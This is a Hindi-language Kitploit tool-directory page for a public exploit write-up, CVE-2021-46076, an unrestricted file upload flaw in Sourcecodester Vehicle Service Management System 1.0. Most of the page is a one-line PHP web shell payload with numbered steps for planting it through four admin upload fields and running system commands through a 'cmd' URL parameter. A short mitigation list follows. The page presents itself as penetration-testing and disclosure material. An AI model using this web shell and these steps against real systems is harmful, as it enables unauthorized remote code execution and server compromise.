Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
Vehicle-Service-Management-System-Multiple-File-upload-Leads-to-Code-Execution — CVE-2021-46076 - Sourcecodester Vehicle Service Management System 1.0 फ़ाइल अपलोड के लिए असुरक्षित है। एक हमलावर कई एंडपॉइंट्स में एक दुर्भावनापूर्ण php फ़ाइल अपलोड कर सकता है, जिससे कोड निष्पादन हो सकता है। | Kitploit
उपकरण/GitHubGitHub/sanupl/vehicle-service-management-system-multiple-file-upload-leads-to-code-execution
पेलोड जनरेशनभेद्यता विश्लेषणकोड विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंग
GitHubsanupl/vehicle-service-management-system-multiple-file-upload-leads-to-code-execution

Vehicle-Service-Management-System-Multiple-File-upload-Leads-to-Code-Execution

CVE-2021-46076 - Sourcecodester Vehicle Service Management System 1.0 फ़ाइल अपलोड के लिए असुरक्षित है। एक हमलावर कई एंडपॉइंट्स में एक दुर्भावनापूर्ण php फ़ाइल अपलोड कर सकता है, जिससे कोड निष्पादन हो सकता है।

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें
3 महीने पहलेअभी तक समीक्षित नहीं

CVE-2021-46076

शोषण शीर्षक: वाहन सेवा प्रबंधन प्रणाली - 'एकाधिक' फ़ाइल अपलोड जिससे कोड निष्पादन होता है

शोषण लेखक: SANU P.L

CVE: CVE-2021-46076

CVSS: 8.8 HIGH

संदर्भ:

  • https://www.plsanu.com/vehicle-service-management-system-multiple-file-upload-leads-to-code-execution
  • https://nvd.nist.gov/vuln/detail/CVE-2021-46076
  • https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-46076

विवरण:

Sourcecodester Vehicle Service Management System 1.0 फ़ाइल अपलोड के लिए संवेदनशील है। एक हमलावर एकाधिक एंडपॉइंट्स पर एक दुर्भावनापूर्ण php फ़ाइल अपलोड कर सकता है, जिससे कोड निष्पादन होता है।

1. वाहन सेवा प्रबंधन प्रणाली - 'MyAccount' (/admin/?page=user)

शोषण:

  1. एडमिन पैनल में लॉगिन करें http://localhost/vehicle_service/admin
  2. मेरा खाता अनुभाग पर जाएं http://localhost/vehicle_service/admin/?page=user

Payload:

root@kitploit:~
<?php system($_GET['cmd']);?>
  1. उपरोक्त php कोड सहेजें उदाहरण के लिए: Cmd.php
  2. My Account अनुभाग में सभी आवश्यक विवरण दर्ज करें और Avatar में php फ़ाइल ब्राउज़ करें।
  3. अपडेट बटन पर क्लिक करें।
  4. Avatar छवि को नए टैब में खोलें।
  5. URL में cmd पैरामीटर जोड़ें और कमांड निष्पादित करें।
  6. अंतिम URL: http://localhost/vehicle_service/uploads/1640632740_Cmd.php?cmd=whoami
  7. सभी सिस्टम कमांड निष्पादित करें उदाहरण के लिए: id, whoami, pwd आदि।

2. वाहन सेवा प्रबंधन प्रणाली - 'User List' (/admin/?page=user/manage_user)

शोषण:

  1. एडमिन पैनल में लॉगिन करें http://localhost/vehicle_service/admin
  2. User List अनुभाग पर जाएं और Create New बटन पर क्लिक करें।

Payload:

root@kitploit:~
<?php system($_GET['cmd']);?>
  1. उपरोक्त php कोड सहेजें उदाहरण के लिए: Cmd.php
  2. Create New User पृष्ठ पर सभी आवश्यक विवरण दर्ज करें और Avatar में php फ़ाइल ब्राउज़ करें।
  3. Save बटन पर क्लिक करें।
  4. Avatar छवि को नए टैब में खोलें।
  5. URL में cmd पैरामीटर जोड़ें और कमांड निष्पादित करें।
  6. अंतिम URL: http://localhost/vehicle_service/uploads/1640632740_Cmd.php?cmd=whoami
  7. सभी सिस्टम कमांड निष्पादित करें उदाहरण के लिए: id, whoami, pwd आदि।

3. वाहन सेवा प्रबंधन प्रणाली - 'Settings-System Logo' (/admin/?page=system_info)

शोषण:

  1. एडमिन पैनल में लॉगिन करें http://localhost/vehicle_service/admin
  2. Settings अनुभाग पर जाएं http://localhost/vehicle_service/admin/?page=system_info

Payload:

root@kitploit:~
<?php system($_GET['cmd']);?>
  1. उपरोक्त php कोड सहेजें उदाहरण के लिए: Cmd.php
  2. Settings अनुभाग में सभी आवश्यक विवरण दर्ज करें और System Logo में php फ़ाइल ब्राउज़ करें।
  3. अपडेट बटन पर क्लिक करें।
  4. System Logo छवि को नए टैब में खोलें।
  5. URL में cmd पैरामीटर जोड़ें और कमांड निष्पादित करें।
  6. अंतिम URL: http://localhost/vehicle_service/uploads/1640632740_Cmd.php?cmd=whoami
  7. सभी सिस्टम कमांड निष्पादित करें उदाहरण के लिए: id, whoami, pwd आदि।

4. वाहन सेवा प्रबंधन प्रणाली - 'Settings-Website Cover' (/admin/?page=system_info)

शोषण:

  1. एडमिन पैनल में लॉगिन करें http://localhost/vehicle_service/admin
  2. Settings अनुभाग पर जाएं http://localhost/vehicle_service/admin/?page=system_info

Payload:

root@kitploit:~
<?php system($_GET['cmd']);?>
  1. उपरोक्त php कोड सहेजें उदाहरण के लिए: Cmd.php
  2. Settings अनुभाग में सभी आवश्यक विवरण दर्ज करें और Website Cover में php फ़ाइल ब्राउज़ करें।
  3. अपडेट बटन पर क्लिक करें।
  4. Website Cover छवि को नए टैब में खोलें।
  5. URL में cmd पैरामीटर जोड़ें और कमांड निष्पादित करें।
  6. अंतिम URL: http://localhost/vehicle_service/uploads/1640632740_Cmd.php?cmd=whoami
  7. सभी सिस्टम कमांड निष्पादित करें उदाहरण के लिए: id, whoami, pwd आदि।

प्रभाव:

एक हमलावर एकाधिक एंडपॉइंट्स पर दुर्भावनापूर्ण php फ़ाइल अपलोड कर सकता है, जिससे कोड निष्पादन होता है।

शमन:

निम्नलिखित को लागू करने की अनुशंसा की जाती है:

  • फ़ाइल नाम और उसके एक्सटेंशन को बिना सफ़ेद-सूची फ़िल्टर के सीधे स्वीकार न करें।
  • यदि यूनिकोड वर्णों की आवश्यकता नहीं है, तो केवल अल्फ़ा-न्यूमेरिक वर्ण और फ़ाइल नाम एवं एक्सटेंशन के लिए इनपुट के रूप में केवल एक डॉट स्वीकार करने की अत्यधिक अनुशंसा की जाती है।
  • सेवा अस्वीकृति हमलों को रोकने के लिए फ़ाइल आकार को अधिकतम मान तक सीमित करें।
  • अपलोड की गई निर्देशिका में कोई "execute" अनुमति नहीं होनी चाहिए।
  • केवल क्लाइंट-साइड सत्यापन पर निर्भर न रहें।
टूल डाउनलोड करें